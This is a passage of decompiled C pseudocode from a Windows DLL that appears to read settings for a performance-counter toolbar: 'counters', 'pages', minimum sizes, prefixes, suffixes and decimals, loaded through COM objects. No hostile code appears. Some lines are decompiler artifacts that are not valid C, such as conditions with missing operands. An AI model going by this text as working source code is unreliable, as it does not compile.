																																																																													_t990 = _t989 ^ _t1905;
																																																																													_v1492 = _t990;
																																																																													_push(_t1842);
																																																																													_push(_t1823);
																																																																													_push(_t990);
																																																																													_t991 =  &_v1484;
																																																																													 *[fs:0x0] = _t991;
																																																																													_t1844 = _t1606;
																																																																													_v1500 = _t1844;
																																																																													__eflags =  *0x6e5014d8;
																																																																													if( *0x6e5014d8 == 0) {
																																																																														__imp__CoInitialize(0);
																																																																														__eflags = _t991;
																																																																														_t1799 =  >=  ? 1 :  *0x6e5014d8 & 0x000000ff;
																																																																														 *0x6e5014d8 =  >=  ? 1 :  *0x6e5014d8 & 0x000000ff;
																																																																													}
																																																																													_v48 = 0;
																																																																													E6E4BC430(_t1562, _t1844 + 4, _t1799, _t1975);
																																																																													__eflags =  *((intOrPtr*)(_t1844 + 0x14)) -  *((intOrPtr*)(_t1844 + 0xc)) >> 2 - 0x10;
																																																																													if( *((intOrPtr*)(_t1844 + 0x14)) -  *((intOrPtr*)(_t1844 + 0xc)) >> 2 < 0x10) {
																																																																														E6E4BCA70(_t1844 + 0xc, _t1799, _t1975, 0x10);
																																																																													}
																																																																													_v124 =  *((intOrPtr*)(_t1844 + 4));
																																																																													E6E4BC7A0(_t1562, _t1844 + 0xc, _t1823, _t1844, _t1975, 0x10,  &_v124);
																																																																													_t999 = _t1844 + 0x20;
																																																																													 *(_t1844 + 0x18) = 7;
																																																																													 *(_t1844 + 0x1c) = 8;
																																																																													_t1825 = _t999[1];
																																																																													_t1845 =  *_t999;
																																																																													_v124 = _t999;
																																																																													__eflags = _t1845 - _t1825;
																																																																													if(_t1845 != _t1825) {
																																																																														do {
																																																																															E6E4BC550(_t1562, _t1845 + 4, _t1825, _t1845, _t1975);
																																																																															_t1845 = _t1845 + 0x10;
																																																																															__eflags = _t1845 - _t1825;
																																																																														} while (_t1845 != _t1825);
																																																																														_t999 = _v124;
																																																																														_t1845 =  *_t999;
																																																																													}
																																																																													_t999[1] = _t1845;
																																																																													_v80 = 0;
																																																																													_t1000 =  &_v116;
																																																																													_v48 = 2;
																																																																													__imp__CoCreateInstance(0x6e4eb3a0, 0, 0x17, 0x6e4f8bdc, _t1000);
																																																																													_t1846 = _t1000;
																																																																													__eflags = _t1846;
																																																																													if(_t1846 < 0) {
																																																																														L621:
																																																																														_t1001 = 0;
																																																																														_v80 = 0;
																																																																														__eflags = _t1846;
																																																																														if(_t1846 >= 0) {
																																																																															goto L623;
																																																																														} else {
																																																																															_v117 = 0;
																																																																															goto L673;
																																																																														}
																																																																													} else {
																																																																														__imp__OleRun(_v116);
																																																																														_t1846 = _t1000;
																																																																														__eflags = _t1846;
																																																																														if(_t1846 >= 0) {
																																																																															_t1628 = _v116;
																																																																															_t1801 =  &_v80;
																																																																															_t1846 =  *((intOrPtr*)( *_t1628))(_t1628, 0x6e4f8bcc,  &_v80);
																																																																														}
																																																																														_t1062 = _v116;
																																																																														 *((intOrPtr*)( *_t1062 + 8))(_t1062);
																																																																														__eflags = _t1846;
																																																																														if(_t1846 >= 0) {
																																																																															L623:
																																																																															_v96 = 0;
																																																																															_v92 = 7;
																																																																															_v112 = 0;
																																																																															_v48 = 5;
																																																																															L590();
																																																																															__eflags = 0;
																																																																															if(0 != 0) {
																																																																																L667:
																																																																																_v117 = 0;
																																																																																goto L668;
																																																																															} else {
																																																																																_t1846 = _v80;
																																																																																__eflags = _t1846;
																																																																																if(__eflags == 0) {
																																																																																	L676:
																																																																																	E6E4C8660(0x80004003);
																																																																																	goto L677;
																																																																																} else {
																																																																																	__eflags = _v92 - 8;
																																																																																	_t1825 =  >=  ? _v112 :  &_v112;
																																																																																	_v124 =  *((intOrPtr*)( *_t1846 + 0xe8));
																																																																																	_v140 = 8;
																																																																																	__imp__#2(_t1825);
																																																																																	_v132 = 8;
																																																																																	__eflags = 8;
																																																																																	if(8 != 0) {
																																																																																		L627:
																																																																																		_v48 = 7;
																																																																																		asm("movups xmm0, [ebp-0x60]");
																																																																																		_t1934 = _t1934 - 0x10;
																																																																																		asm("movups [eax], xmm0");
																																																																																		_t1846 = _v124(_t1846,  &_v88);
																																																																																		__imp__#9( &_v140);
																																																																																		__eflags = _t1846;
																																																																																		if(_t1846 != 0) {
																																																																																			goto L667;
																																																																																		} else {
																																																																																			_v76 = _t1846;
																																																																																			_v48 = 9;
																																																																																			_t1031 = _v80;
																																																																																			__eflags = _t1031;
																																																																																			if(__eflags == 0) {
																																																																																				goto L678;
																																																																																			} else {
																																																																																				_t1615 =  *_t1031;
																																																																																				_t1801 =  &_v76;
																																																																																				_v48 = 9;
																																																																																				_v76 = _t1846;
																																																																																				_t1032 = _t1615[0x2d](_t1031,  &_v76);
																																																																																				__eflags = _t1032;
																																																																																				if(_t1032 >= 0) {
																																																																																					_v84 = 0;
																																																																																					_v48 = 0xd;
																																																																																					_t1033 = _v76;
																																																																																					__eflags = _t1033;
																																																																																					if(__eflags == 0) {
																																																																																						goto L679;
																																																																																					} else {
																																																																																						_t1801 =  &_v84;
																																																																																						_t1034 =  *((intOrPtr*)( *_t1033 + 0x1c))(_t1033,  &_v84);
																																																																																						_t1846 = __imp__#6;
																																																																																						__eflags = _t1034;
																																																																																						if(_t1034 >= 0) {
																																																																																							_t1615 =  &_v84;
																																																																																							_t1035 = E6E4B8BF0(_t1562, _t1615, _t1825, _t1846, "perfbar");
																																																																																							__eflags = _t1035;
																																																																																							if(_t1035 == 0) {
																																																																																								L658:
																																																																																								_v117 = 1;
																																																																																								goto L659;
																																																																																							} else {
																																																																																								_v68 = 0;
																																																																																								_v48 = 0x10;
																																																																																								_t1846 = _v76;
																																																																																								__eflags = _t1846;
																																																																																								if(__eflags == 0) {
																																																																																									goto L680;
																																																																																								} else {
																																																																																									_t1039 =  *_t1846;
																																																																																									_t1615 =  &_v68;
																																																																																									_t1825 =  *(_t1039 + 0x34);
																																																																																									L682();
																																																																																									 *( *(_t1039 + 0x34))(_t1846, _t1039);
																																																																																									_t1041 = _v68;
																																																																																									_t1846 = __imp__#6;
																																																																																									__eflags = _t1041;
																																																																																									if(_t1041 == 0) {
																																																																																										L656:
																																																																																										_v48 = 0x1e;
																																																																																										__eflags = _t1041;
																																																																																										if(_t1041 != 0) {
																																																																																											 *((intOrPtr*)( *_t1041 + 8))(_t1041);
																																																																																										}
																																																																																										goto L658;
																																																																																									} else {
																																																																																										_t1825 = _v72;
																																																																																										while(1) {
																																																																																											_v116 = 0;
																																																																																											_v48 = 0x11;
																																																																																											__eflags = _t1041;
																																																																																											if(__eflags == 0) {
																																																																																												goto L676;
																																																																																											}
																																																																																											_t1801 =  &_v116;
																																																																																											_t1043 =  *((intOrPtr*)( *_t1041 + 0x1c))(_t1041,  &_v116);
																																																																																											__eflags = _t1043;
																																																																																											if(_t1043 < 0) {
																																																																																												L664:
																																																																																												 *_t1846(_v116);
																																																																																												_v48 = 0x18;
																																																																																												_t1045 = _v68;
																																																																																												__eflags = _t1045;
																																																																																												if(_t1045 != 0) {
																																																																																													 *((intOrPtr*)( *_t1045 + 8))(_t1045);
																																																																																												}
																																																																																												_v117 = 0;
																																																																																												goto L659;
																																																																																											} else {
																																																																																												_t1047 = E6E4B8BF0(_t1562,  &_v116, _t1825, _t1846, "counters");
																																																																																												__eflags = _t1047;
																																																																																												if(_t1047 == 0) {
																																																																																													_t1048 = E6E4B8BF0(_t1562,  &_v116, _t1825, _t1846, "pages");
																																																																																													__eflags = _t1048;
																																																																																													if(_t1048 == 0) {
																																																																																														_t1615 =  &_v116;
																																																																																														_t1049 = E6E4B8BF0(_t1562, _t1615, _t1825, _t1846, "settings");
																																																																																														__eflags = _t1049;
																																																																																														if(_t1049 != 0) {
																																																																																															_t1801 = _t1825 + 0x2c;
																																																																																															_t1615 =  &_v68;
																																																																																															L508();
																																																																																														}
																																																																																													} else {
																																																																																														_t1801 = _t1825 + 0x20;
																																																																																														_t1615 =  &_v68;
																																																																																														E6E4B9950(_t1562, _t1615, _t1825 + 0x20, _t1825, _t1846, _t1975);
																																																																																													}
																																																																																												} else {
																																																																																													_t1801 = _t1825;
																																																																																													_t1615 =  &_v68;
																																																																																													E6E4B95A0(_t1562, _t1615, _t1825, _t1825, _t1846, _t1975);
																																																																																												}
																																																																																												_v72 = 0;
																																																																																												_v48 = 0x15;
																																																																																												_t1050 = _v68;
																																																																																												__eflags = _t1050;
																																																																																												if(__eflags == 0) {
																																																																																													goto L676;
																																																																																												} else {
																																																																																													_t1615 =  *_t1050;
																																																																																													_t1801 =  &_v72;
																																																																																													_v48 = 0x15;
																																																																																													_v72 = 0;
																																																																																													_t1051 = _t1615[0x10](_t1050,  &_v72);
																																																																																													__eflags = _t1051;
																																																																																													if(_t1051 < 0) {
																																																																																														_v48 = 0x17;
																																																																																														_t1052 = _v72;
																																																																																														__eflags = _t1052;
																																																																																														if(_t1052 != 0) {
																																																																																															 *((intOrPtr*)( *_t1052 + 8))(_t1052);
																																																																																														}
																																																																																														goto L664;
																																																																																													} else {
																																																																																														_t1850 = _v68;
																																																																																														_t1054 = _v72;
																																																																																														__eflags = _t1850 - _t1054;
																																																																																														if(_t1850 != _t1054) {
																																																																																															_v68 = _t1054;
																																																																																															_v48 = 0x1c;
																																																																																															__eflags = _t1054;
																																																																																															if(_t1054 != 0) {
																																																																																																_t1615 =  *_t1054;
																																																																																																_t1615[1](_t1054);
																																																																																																_t1054 = _v72;
																																																																																															}
																																																																																															_v48 = 0x1b;
																																																																																															__eflags = _t1850;
																																																																																															if(_t1850 != 0) {
																																																																																																 *((intOrPtr*)( *_t1850 + 8))(_t1850);
																																																																																																_t1054 = _v72;
																																																																																															}
																																																																																														}
																																																																																														_v48 = 0x1d;
																																																																																														__eflags = _t1054;
																																																																																														if(_t1054 != 0) {
																																																																																															_t1615 =  *_t1054;
																																																																																															_t1615[2](_t1054);
																																																																																														}
																																																																																														_t1846 = __imp__#6;
																																																																																														 *_t1846(_v116);
																																																																																														_t1041 = _v68;
																																																																																														__eflags = _t1041;
																																																																																														if(_t1041 != 0) {
																																																																																															continue;
																																																																																														} else {
																																																																																															goto L656;
																																																																																														}
																																																																																													}
																																																																																												}
																																																																																											}
																																																																																											goto L685;
																																																																																										}
																																																																																										goto L676;
																																																																																									}
																																																																																								}
																																																																																							}
																																																																																						} else {
																																																																																							_v117 = 0;
																																																																																							L659:
																																																																																							 *_t1846(_v84);
																																																																																							goto L660;
																																																																																						}
																																																																																					}
																																																																																				} else {
																																																																																					_v117 = 0;
																																																																																					L660:
																																																																																					_v48 = 0x1f;
																																																																																					_t1037 = _v76;
																																																																																					__eflags = _t1037;
																																																																																					if(_t1037 != 0) {
																																																																																						 *((intOrPtr*)( *_t1037 + 8))(_t1037);
																																																																																					}
																																																																																					L668:
																																																																																					_v48 = 1;
																																																																																					_t1800 = _v92;
																																																																																					__eflags = _t1800 - 8;
																																																																																					if(_t1800 < 8) {
																																																																																						L672:
																																																																																						__eflags = 0;
																																																																																						_v96 = 0;
																																																																																						_v112 = 0;
																																																																																						_t1001 = _v80;
																																																																																						_v92 = 7;
																																																																																						L673:
																																																																																						_v48 = 0x20;
																																																																																						__eflags = _t1001;
																																																																																						if(_t1001 != 0) {
																																																																																							 *((intOrPtr*)( *_t1001 + 8))(_t1001);
																																																																																						}
																																																																																						 *[fs:0x0] = _v56;
																																																																																						__eflags = _v64 ^ _t1905;
																																																																																						return E6E4C4D4A(_v64 ^ _t1905);
																																																																																					} else {
																																																																																						_t1615 = _v112;
																																																																																						_t1801 = 2 + _t1800 * 2;
																																																																																						_t1007 = _t1615;
																																																																																						__eflags = _t1801 - 0x1000;
																																																																																						if(_t1801 < 0x1000) {
																																																																																							L671:
																																																																																							_push(_t1801);
																																																																																							E6E4C4D5B(_t1615);
																																																																																							goto L672;
																																																																																						} else {
																																																																																							_t1615 =  *(_t1615 - 4);
																																																																																							_t1801 = _t1801 + 0x23;
																																																																																							__eflags = _t1007 - _t1615 + 0xfffffffc - 0x1f;
																																																																																							if(__eflags > 0) {
																																																																																								goto L681;
																																																																																							} else {
																																																																																								goto L671;
																																																																																							}
																																																																																						}
																																																																																					}
																																																																																				}
																																																																																			}
																																																																																		}
																																																																																	} else {
																																																																																		__eflags = _t1825;
																																																																																		if(__eflags != 0) {
																																																																																			L677:
																																																																																			E6E4C8660(0x8007000e);
																																																																																			L678:
																																																																																			E6E4C8660(0x80004003);
																																																																																			L679:
																																																																																			E6E4C8660(0x80004003);
																																																																																			L680:
																																																																																			E6E4C8660(0x80004003);
																																																																																			L681:
																																																																																			E6E4CEF16(_t1562, _t1615, _t1801, _t1825, __eflags);
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			asm("int3");
																																																																																			_push(_t1905);
																																																																																			_push(0xffffffff);
																																																																																			_push(0x6e4e98d0);
																																																																																			_push( *[fs:0x0]);
																																																																																			_push(_t1846);
																																																																																			_t1013 =  *0x6e4ff008; // 0x2b098c7c
																																																																																			_push(_t1013 ^ _t1934);
																																																																																			 *[fs:0x0] =  &_v1612;
																																																																																			_t1848 = _t1615;
																																																																																			_v1604 = 0;
																																																																																			_t1616 =  *_t1848;
																																																																																			__eflags = _t1616;
																																																																																			if(_t1616 != 0) {
																																																																																				 *((intOrPtr*)( *_t1616 + 8))(_t1616);
																																																																																			}
																																																																																			 *_t1848 = 0;
																																																																																			 *[fs:0x0] = _v60;
																																																																																			return _t1848;
																																																																																		} else {
																																																																																			goto L627;
																																																																																		}
																																																																																	}
																																																																																}
																																																																															}
																																																																														} else {
																																																																															goto L621;
																																																																														}
																																																																													}
																																																																												} else {
																																																																													goto L605;
																																																																												}
																																																																											}
																																																																										}
																																																																									}
																																																																								}
																																																																							} else {
																																																																								_v24 = 0xe;
																																																																								_t1095 = E6E4B8CC0(_t1559,  &_v104,  &_v92, __eflags, "minSizeX");
																																																																								_t1642 =  &_v48;
																																																																								_t1096 = E6E4B8FB0(_t1642, _t1095);
																																																																								_t1854 = _v104;
																																																																								_t1566 = _t1096;
																																																																								__eflags = _t1854;
																																																																								if(_t1854 == 0) {
																																																																									_t1823 = __imp__#6;
																																																																								} else {
																																																																									asm("lock xadd [esi+0x8], ecx");
																																																																									__eflags = (_t1642 | 0xffffffff) != 1;
																																																																									if((_t1642 | 0xffffffff) != 1) {
																																																																										L531:
																																																																										_t1823 = __imp__#6;
																																																																										_v104 = 0;
																																																																									} else {
																																																																										__eflags = _t1854;
																																																																										if(_t1854 == 0) {
																																																																											goto L531;
																																																																										} else {
																																																																											_t1135 =  *_t1854;
																																																																											_t1823 = __imp__#6;
																																																																											__eflags = _t1135;
																																																																											if(_t1135 != 0) {
																																																																												 *_t1823(_t1135);
																																																																												 *_t1854 = 0;
																																																																											}
																																																																											_t1136 =  *(_t1854 + 4);
																																																																											__eflags = _t1136;
																																																																											if(_t1136 != 0) {
																																																																												E6E4C4DBC(_t1136);
																																																																												_t1922 = _t1922 + 4;
																																																																												 *(_t1854 + 4) = 0;
																																																																											}
																																																																											_push(0xc);
																																																																											E6E4C4D5B(_t1854);
																																																																											_t1922 = _t1922 + 8;
																																																																											_v104 = 0;
																																																																										}
																																																																									}
																																																																								}
																																																																								__eflags = _t1566;
																																																																								if(__eflags != 0) {
																																																																									_push( &_v76);
																																																																									_t1650 =  &_v108;
																																																																									_t1125 = E6E4B9100(_t1566,  &_v108, _t1808, _t1823, _t1854, _t1975);
																																																																									_v24 = 0xf;
																																																																									_t1859 =  *_t1125;
																																																																									__eflags = _t1859;
																																																																									if(_t1859 == 0) {
																																																																										_t1126 = 0;
																																																																										__eflags = 0;
																																																																									} else {
																																																																										_t1126 =  *(_t1859 + 4);
																																																																										__eflags = _t1126;
																																																																										if(_t1126 == 0) {
																																																																											 *(_t1859 + 4) = E6E4C8680(_t1566,  *_t1859);
																																																																										}
																																																																									}
																																																																									_t1127 = E6E4D5A09(_t1650, _t1126);
																																																																									_t1922 = _t1922 + 4;
																																																																									_v24 = 0xe;
																																																																									_t1860 = _v108;
																																																																									 *_v116 = _t1127;
																																																																									__eflags = _t1860;
																																																																									if(__eflags != 0) {
																																																																										asm("lock xadd [esi+0x8], eax");
																																																																										__eflags = (_t1127 | 0xffffffff) - 1;
																																																																										if(__eflags == 0) {
																																																																											__eflags = _t1860;
																																																																											if(__eflags != 0) {
																																																																												_t1130 =  *_t1860;
																																																																												__eflags = _t1130;
																																																																												if(_t1130 != 0) {
																																																																													 *_t1823(_t1130);
																																																																													 *_t1860 = 0;
																																																																												}
																																																																												_t1131 =  *(_t1860 + 4);
																																																																												__eflags =  *(_t1860 + 4);
																																																																												if(__eflags != 0) {
																																																																													E6E4C4DBC(_t1131);
																																																																													_t1922 = _t1922 + 4;
																																																																													 *(_t1860 + 4) = 0;
																																																																												}
																																																																												_push(0xc);
																																																																												E6E4C4D5B(_t1860);
																																																																												_t1922 = _t1922 + 8;
																																																																											}
																																																																										}
																																																																										_v108 = 0;
																																																																									}
																																																																								}
																																																																								_t1097 = E6E4B8CC0(_t1566,  &_v112, _t1808, __eflags, "minSizeY");
																																																																								_t1644 =  &_v48;
																																																																								_t1098 = E6E4B8FB0(_t1644, _t1097);
																																																																								_t1855 = _v112;
																																																																								_t1567 = _t1098;
																																																																								__eflags = _t1855;
																																																																								if(_t1855 != 0) {
																																																																									asm("lock xadd [esi+0x8], ecx");
																																																																									__eflags = (_t1644 | 0xffffffff) == 1;
																																																																									if((_t1644 | 0xffffffff) == 1) {
																																																																										__eflags = _t1855;
																																																																										if(_t1855 != 0) {
																																																																											_t1119 =  *_t1855;
																																																																											__eflags = _t1119;
																																																																											if(_t1119 != 0) {
																																																																												 *_t1823(_t1119);
																																																																												 *_t1855 = 0;
																																																																											}
																																																																											_t1120 =  *(_t1855 + 4);
																																																																											__eflags = _t1120;
																																																																											if(_t1120 != 0) {
																																																																												E6E4C4DBC(_t1120);
																																																																												_t1922 = _t1922 + 4;
																																																																												 *(_t1855 + 4) = 0;
																																																																											}
																																																																											_push(0xc);
																																																																											E6E4C4D5B(_t1855);
																																																																											_t1922 = _t1922 + 8;
																																																																										}
																																																																									}
																																																																									_v112 = 0;
																																																																								}
																																																																								__eflags = _t1567;
																																																																								if(_t1567 != 0) {
																																																																									_push( &_v76);
																																																																									_t1646 =  &_v120;
																																																																									_t1109 = E6E4B9100(_t1567,  &_v120, _t1808, _t1823, _t1855, _t1975);
																																																																									_v24 = 0x10;
																																																																									_t1857 =  *_t1109;
																																																																									__eflags = _t1857;
																																																																									if(_t1857 == 0) {
																																																																										_t1110 = 0;
																																																																										__eflags = 0;
																																																																									} else {
																																																																										_t1110 =  *(_t1857 + 4);
																																																																										__eflags = _t1110;
																																																																										if(_t1110 == 0) {
																																																																											 *(_t1857 + 4) = E6E4C8680(_t1567,  *_t1857);
																																																																										}
																																																																									}
																																																																									_t1111 = E6E4D5A09(_t1646, _t1110);
																																																																									_t1922 = _t1922 + 4;
																																																																									_t1858 = _v120;
																																																																									 *(_v116 + 4) = _t1111;
																																																																									__eflags = _t1858;
																																																																									if(_t1858 != 0) {
																																																																										asm("lock xadd [esi+0x8], eax");
																																																																										__eflags = (_t1111 | 0xffffffff) == 1;
																																																																										if((_t1111 | 0xffffffff) == 1) {
																																																																											__eflags = _t1858;
																																																																											if(_t1858 != 0) {
																																																																												_t1114 =  *_t1858;
																																																																												__eflags = _t1114;
																																																																												if(_t1114 != 0) {
																																																																													 *_t1823(_t1114);
																																																																													 *_t1858 = 0;
																																																																												}
																																																																												_t1115 =  *(_t1858 + 4);
																																																																												__eflags = _t1115;
																																																																												if(_t1115 != 0) {
																																																																													E6E4C4DBC(_t1115);
																																																																													_t1922 = _t1922 + 4;
																																																																													 *(_t1858 + 4) = 0;
																																																																												}
																																																																												_push(0xc);
																																																																												E6E4C4D5B(_t1858);
																																																																												_t1922 = _t1922 + 8;
																																																																											}
																																																																										}
																																																																										_v120 = 0;
																																																																									}
																																																																								}
																																																																								_t1099 =  &_v76;
																																																																								__imp__#9(_t1099);
																																																																								_t1856 = _v48;
																																																																								__eflags = _t1856;
																																																																								if(_t1856 != 0) {
																																																																									asm("lock xadd [esi+0x8], eax");
																																																																									__eflags = (_t1099 | 0xffffffff) == 1;
																																																																									if((_t1099 | 0xffffffff) == 1) {
																																																																										_t1103 =  *_t1856;
																																																																										__eflags = _t1103;
																																																																										if(_t1103 != 0) {
																																																																											 *_t1823(_t1103);
																																																																											 *_t1856 = 0;
																																																																										}
																																																																										_t1104 =  *(_t1856 + 4);
																																																																										__eflags = _t1104;
																																																																										if(_t1104 != 0) {
																																																																											E6E4C4DBC(_t1104);
																																																																											_t1922 = _t1922 + 4;
																																																																											 *(_t1856 + 4) = 0;
																																																																										}
																																																																										_push(0xc);
																																																																										E6E4C4D5B(_t1856);
																																																																										_t1922 = _t1922 + 8;
																																																																									}
																																																																								}
																																																																								_v24 = 4;
																																																																								_t1559 = __imp__#6;
																																																																								 *_t1559(_v52);
																																																																								_t1083 = _v40;
																																																																								_t1594 = _v100 + 1;
																																																																								_v100 = _t1594;
																																																																								__eflags = _t1594 - _v56;
																																																																								if(_t1594 < _v56) {
																																																																									continue;
																																																																								} else {
																																																																									goto L578;
																																																																								}
																																																																							}
																																																																						}
																																																																					}
																																																																				}
																																																																			}
																																																																		}
																																																																		goto L685;
																																																																	}
																																																																	goto L587;
																																																																}
																																																															}
																																																														}
																																																													}
																																																												}
																																																											} else {
																																																												_v20 = 0xe;
																																																												_t1160 = E6E4B8CC0(_t1559,  &_v104, _t1794, __eflags, "prefix");
																																																												_t1662 =  &_v36;
																																																												_t1161 = E6E4B8FB0(_t1662, _t1160);
																																																												_t1862 = _v104;
																																																												_t1570 = _t1161;
																																																												__eflags = _t1862;
																																																												if(_t1862 == 0) {
																																																													_t1823 = __imp__#6;
																																																												} else {
																																																													asm("lock xadd [esi+0x8], ecx");
																																																													__eflags = (_t1662 | 0xffffffff) != 1;
																																																													if((_t1662 | 0xffffffff) != 1) {
																																																														L366:
																																																														_t1823 = __imp__#6;
																																																														_v104 = 0;
																																																													} else {
																																																														__eflags = _t1862;
																																																														if(_t1862 == 0) {
																																																															goto L366;
																																																														} else {
																																																															_t1273 =  *_t1862;
																																																															_t1823 = __imp__#6;
																																																															__eflags = _t1273;
																																																															if(_t1273 != 0) {
																																																																 *_t1823(_t1273);
																																																																 *_t1862 = 0;
																																																															}
																																																															_t1274 =  *(_t1862 + 4);
																																																															__eflags = _t1274;
																																																															if(_t1274 != 0) {
																																																																E6E4C4DBC(_t1274);
																																																																_t1921 = _t1921 + 4;
																																																																 *(_t1862 + 4) = 0;
																																																															}
																																																															_push(0xc);
																																																															E6E4C4D5B(_t1862);
																																																															_t1921 = _t1921 + 8;
																																																															_v104 = 0;
																																																														}
																																																													}
																																																												}
																																																												__eflags = _t1570;
																																																												if(__eflags == 0) {
																																																													_t1162 = E6E4B8CC0(_t1570,  &_v112, _t1794, __eflags, "suffix");
																																																													_t1664 =  &_v36;
																																																													_t1163 = E6E4B8FB0(_t1664, _t1162);
																																																													_t1863 = _v112;
																																																													_t1571 = _t1163;
																																																													__eflags = _t1863;
																																																													if(_t1863 != 0) {
																																																														asm("lock xadd [esi+0x8], ecx");
																																																														__eflags = (_t1664 | 0xffffffff) == 1;
																																																														if((_t1664 | 0xffffffff) == 1) {
																																																															__eflags = _t1863;
																																																															if(_t1863 != 0) {
																																																																_t1257 =  *_t1863;
																																																																__eflags = _t1257;
																																																																if(_t1257 != 0) {
																																																																	 *_t1823(_t1257);
																																																																	 *_t1863 = 0;
																																																																}
																																																																_t1258 =  *(_t1863 + 4);
																																																																__eflags = _t1258;
																																																																if(_t1258 != 0) {
																																																																	E6E4C4DBC(_t1258);
																																																																	_t1921 = _t1921 + 4;
																																																																	 *(_t1863 + 4) = 0;
																																																																}
																																																																_push(0xc);
																																																																E6E4C4D5B(_t1863);
																																																																_t1921 = _t1921 + 8;
																																																															}
																																																														}
																																																														_v112 = 0;
																																																													}
																																																													__eflags = _t1571;
																																																													if(__eflags == 0) {
																																																														_t1164 = E6E4B8CC0(_t1571,  &_v120, _t1794, __eflags, "counter");
																																																														_t1666 =  &_v36;
																																																														_t1165 = E6E4B8FB0(_t1666, _t1164);
																																																														_t1864 = _v120;
																																																														_t1572 = _t1165;
																																																														__eflags = _t1864;
																																																														if(_t1864 != 0) {
																																																															asm("lock xadd [esi+0x8], ecx");
																																																															__eflags = (_t1666 | 0xffffffff) == 1;
																																																															if((_t1666 | 0xffffffff) == 1) {
																																																																__eflags = _t1864;
																																																																if(_t1864 != 0) {
																																																																	_t1241 =  *_t1864;
																																																																	__eflags = _t1241;
																																																																	if(_t1241 != 0) {
																																																																		 *_t1823(_t1241);
																																																																		 *_t1864 = 0;
																																																																	}
																																																																	_t1242 =  *(_t1864 + 4);
																																																																	__eflags = _t1242;
																																																																	if(_t1242 != 0) {
																																																																		E6E4C4DBC(_t1242);
																																																																		_t1921 = _t1921 + 4;
																																																																		 *(_t1864 + 4) = 0;
																																																																	}
																																																																	_push(0xc);
																																																																	E6E4C4D5B(_t1864);
																																																																	_t1921 = _t1921 + 8;
																																																																}
																																																															}
																																																															_v120 = 0;
																																																														}
																																																														__eflags = _t1572;
																																																														if(__eflags == 0) {
																																																															_t1166 = E6E4B8CC0(_t1572,  &_v128, _t1794, __eflags, "divide");
																																																															_t1668 =  &_v36;
																																																															_t1167 = E6E4B8FB0(_t1668, _t1166);
																																																															_t1865 = _v128;
																																																															_t1573 = _t1167;
																																																															__eflags = _t1865;
																																																															if(_t1865 != 0) {
																																																																asm("lock xadd [esi+0x8], ecx");
																																																																__eflags = (_t1668 | 0xffffffff) == 1;
																																																																if((_t1668 | 0xffffffff) == 1) {
																																																																	__eflags = _t1865;
																																																																	if(_t1865 != 0) {
																																																																		_t1225 =  *_t1865;
																																																																		__eflags = _t1225;
																																																																		if(_t1225 != 0) {
																																																																			 *_t1823(_t1225);
																																																																			 *_t1865 = 0;
																																																																		}
																																																																		_t1226 =  *(_t1865 + 4);
																																																																		__eflags = _t1226;
																																																																		if(_t1226 != 0) {
																																																																			E6E4C4DBC(_t1226);
																																																																			_t1921 = _t1921 + 4;
																																																																			 *(_t1865 + 4) = 0;
																																																																		}
																																																																		_push(0xc);
																																																																		E6E4C4D5B(_t1865);
																																																																		_t1921 = _t1921 + 8;
																																																																	}
																																																																}
																																																																_v128 = 0;
																																																															}
																																																															__eflags = _t1573;
																																																															if(__eflags == 0) {
																																																																_t1168 = E6E4B8CC0(_t1573,  &_v136, _t1794, __eflags, "decimals");
																																																																_t1670 =  &_v36;
																																																																_t1169 = E6E4B8FB0(_t1670, _t1168);
																																																																_t1866 = _v136;
																																																																_t1574 = _t1169;
																																																																__eflags = _t1866;
																																																																if(_t1866 != 0) {
																																																																	asm("lock xadd [esi+0x8], ecx");
																																																																	__eflags = (_t1670 | 0xffffffff) == 1;
																																																																	if((_t1670 | 0xffffffff) == 1) {
																																																																		__eflags = _t1866;
																																																																		if(_t1866 != 0) {
																																																																			_t1208 =  *_t1866;
																																																																			__eflags = _t1208;
																																																																			if(_t1208 != 0) {
																																																																				 *_t1823(_t1208);
																																																																				 *_t1866 = 0;
																																																																			}
																																																																			_t1209 =  *(_t1866 + 4);
																																																																			__eflags = _t1209;
																																																																			if(_t1209 != 0) {
																																																																				E6E4C4DBC(_t1209);
																																																																				_t1921 = _t1921 + 4;
																																																																				 *(_t1866 + 4) = 0;
																																																																			}
																																																																			_push(0xc);
																																																																			E6E4C4D5B(_t1866);
																																																																			_t1921 = _t1921 + 8;
																																																																		}
																																																																	}
																																																																	_v136 = 0;
																																																																}
																																																																__eflags = _t1574;
																																																																if(__eflags == 0) {
																																																																	_t1170 = E6E4B8CC0(_t1574,  &_v144, _t1794, __eflags, "characters");
																																																																	_t1672 =  &_v36;
																																																																	_t1171 = E6E4B8FB0(_t1672, _t1170);
																																																																	_t1867 = _v144;
																																																																	_t1575 = _t1171;
																																																																	__eflags = _t1867;
																																																																	if(_t1867 != 0) {
																																																																		asm("lock xadd [esi+0x8], ecx");
																																																																		__eflags = (_t1672 | 0xffffffff) == 1;
																																																																		if((_t1672 | 0xffffffff) == 1) {
																																																																			__eflags = _t1867;
																																																																			if(_t1867 != 0) {
																																																																				_t1192 =  *_t1867;
																																																																				__eflags = _t1192;
																																																																				if(_t1192 != 0) {
																																																																					 *_t1823(_t1192);
																																																																					 *_t1867 = 0;
																																																																				}
																																																																				_t1193 =  *(_t1867 + 4);
																																																																				__eflags = _t1193;
																																																																				if(_t1193 != 0) {
																																																																					E6E4C4DBC(_t1193);
																																																																					_t1921 = _t1921 + 4;
																																																																					 *(_t1867 + 4) = 0;
																																																																				}
																																																																				_push(0xc);
																																																																				E6E4C4D5B(_t1867);
																																																																				_t1921 = _t1921 + 8;
																																																																			}
																																																																		}
																																																																		_v144 = 0;
																																																																	}
																																																																	__eflags = _t1575;
																																																																	if(_t1575 != 0) {
																																																																		_push( &_v72);
																																																																		_t1182 = E6E4B9100(_t1575,  &_v148, _t1794, _t1823, _t1867, _t1975);
																																																																		_v20 = 0x14;
																																																																		_t1184 = E6E4D5A09(_t1182, E6E4B8F90(_t1182));
																																																																		_t1921 = _t1921 + 4;
																																																																		_t1869 = _v148;
																																																																		 *(_v96 + 0x48) = _t1184;
																																																																		__eflags = _t1869;
																																																																		if(_t1869 != 0) {
																																																																			asm("lock xadd [esi+0x8], eax");
																																																																			__eflags = (_t1184 | 0xffffffff) == 1;
																																																																			if((_t1184 | 0xffffffff) == 1) {
																																																																				__eflags = _t1869;
																																																																				if(_t1869 != 0) {
																																																																					_t1187 =  *_t1869;
